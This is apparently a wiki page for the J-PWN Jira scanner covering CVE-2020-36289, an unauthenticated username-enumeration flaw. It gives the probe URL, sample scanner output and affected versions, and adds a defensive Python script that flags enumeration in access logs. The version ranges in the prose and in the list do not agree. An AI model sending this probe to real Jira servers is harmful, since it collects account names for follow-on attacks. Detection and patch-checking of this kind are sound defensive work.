CVE‐2020‐36289 - carnal0wnage/J-PWN GitHub Wiki

CVE-2020-36289

Category: [Username Enumeration]

module name: check_cve_2020_36289

url: secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin

INFO: Checking for CVE-2020-36289 (Username Enumeration via QueryComponentRendererValue)
- Not Vulnerable: HTTP 401 Unauthorized onhttp://JIRA/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
INFO: Checking for CVE-2020-36289 (Username Enumeration via QueryComponentRendererValue)
- No CVE-2020-36289 vulnerability detected on https://JIRA/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin: Empty Response ({})
INFO: Checking for CVE-2020-36289 (Username Enumeration via QueryComponentRendererValue)
[+] Vulnerable to CVE-2020-36289
  URL: http://JIRA/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin

  Response Details:
  Assignee:
    - Name: 经办人
    - View HTML (First 50 chars):                 <div class="searcherValue">
    
 
    - Edit HTML (First 50 chars): 
    
                                    <div cla...
    - JQL: assignee in (admin)
    - Valid Searcher: False
    - Is Shown: False

Reference: https://jira.atlassian.com/browse/JRASERVER-71559

Description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint.

This vulnerability was discovered by Mikhail Klyuchnikov of Positive Technologies.

The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.

Affected versions:

  • version < 8.5.15
  • 8.6.0 ≤ version < 8.13.7
  • 8.14.0 ≤ version < 8.17.0

Fixed versions:

  • 8.5.15
  • 8.13.7
  • 8.17.0

Note: this issue may also affect patched Jira instances if anonymous user access is enabled. For more information, refer to Atlassian's documentation on controlling anonymous user access.
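Because a patched instance can still answer this endpoint when anonymous access is enabled, reviewing access logs for the request pattern is a useful complement to a version check. The following is an added example, not part of J-PWN or Atlassian's advisory: it flags clients that requested many distinct `assignee=user:<name>` values without authentication. The Combined Log Format, the `find_enumeration` name, the threshold and the sample lines are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

ENDPOINT = "/secure/QueryComponentRendererValue!Default.jspa"  # path from this page

# Assumption: Combined Log Format from a reverse proxy in front of Jira,
# where the third field is "-" when the request carried no authenticated user.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

SAMPLE_LOG = [  # constructed lines, documentation IP ranges, not real traffic
    '198.51.100.7 - - [10/Mar/2021:10:00:01 +0000] "GET /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1" 200 812',
    '198.51.100.7 - - [10/Mar/2021:10:00:02 +0000] "GET /secure/QueryComponentRendererValue!Default.jspa?assignee=user:jsmith HTTP/1.1" 200 2',
    '198.51.100.7 - - [10/Mar/2021:10:00:03 +0000] "GET /secure/QueryComponentRendererValue%21Default.jspa?assignee=user%3Asvc-backup HTTP/1.1" 200 790',
    '192.0.2.10 - alice [10/Mar/2021:10:01:00 +0000] "GET /secure/QueryComponentRendererValue!Default.jspa?assignee=user:alice HTTP/1.1" 200 640',
    '192.0.2.44 - - [10/Mar/2021:10:02:00 +0000] "GET /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1" 401 0',
]

def find_enumeration(lines, min_usernames=3):
    """Group unauthenticated requests to the endpoint by client IP and return
    the clients that probed at least `min_usernames` distinct usernames."""
    hits = defaultdict(lambda: {"usernames": set(), "http_200": 0})
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["user"] != "-":          # unparsable or authenticated
            continue
        url = urlsplit(m["target"])
        # unquote() so that an encoded "!" (%21) in the path still matches;
        # endswith() tolerates a context path such as /jira.
        if not unquote(url.path).endswith(ENDPOINT):
            continue
        names = [v[len("user:"):] for v in parse_qs(url.query).get("assignee", [])
                 if v.startswith("user:")]
        if not names:
            continue
        hits[m["ip"]]["usernames"].update(names)
        # HTTP 200 means the endpoint answered anonymously; 401 means it did not.
        hits[m["ip"]]["http_200"] += int(m["status"] == "200")
    return {ip: {"usernames": sorted(h["usernames"]), "http_200": h["http_200"]}
            for ip, h in hits.items() if len(h["usernames"]) >= min_usernames}

if __name__ == "__main__":
    print(find_enumeration(SAMPLE_LOG))
```

A non-zero `http_200` count only shows that the endpoint responded without authentication; as the sample output above shows, a 200 with an empty `{}` body discloses nothing, so confirm against response sizes or bodies where they are logged.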


other refs: